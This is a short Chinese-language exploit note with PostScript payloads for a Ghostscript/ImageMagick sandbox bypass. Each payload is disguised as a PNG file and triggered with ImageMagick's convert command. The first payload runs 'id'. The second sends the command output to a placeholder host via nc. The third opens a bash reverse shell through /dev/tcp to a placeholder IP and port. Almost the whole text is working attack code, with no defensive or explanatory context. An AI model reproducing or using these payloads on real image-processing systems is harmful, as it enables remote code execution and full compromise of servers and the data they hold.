1.下列内容保存为png,即可(touch 1.png &&vi 1.png)
之后执行convert 1.png 1.gif
之后你就会看到,执行了 >$ id
(如果ubuntu测试的时候没有,可以手动安装imagemagic —-> apt install imagemagick
%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%id) currentdevice putdeviceprops
如果需要nc反弹可以输入如下:
%!PS
userdict /setpagedevice undef
save
legal
{ null restore } stopped { pop } if
{ legal } stopped { pop } if
restore
mark /OutputFile (%pipe%echo `id` | nc xxx.xxx.xxx.xxx 2333) currentdevice putdeviceprops
bash反弹输入如下:
%!PS
userdict /setpagedevice undef
legal
{ null restore } stopped { pop } if
legal
mark /OutputFile (%pipe%bash –i >& /dev/tcp/xxx.xxx.xxx.xxx/2333 0>&1) currentdevice putdeviceprops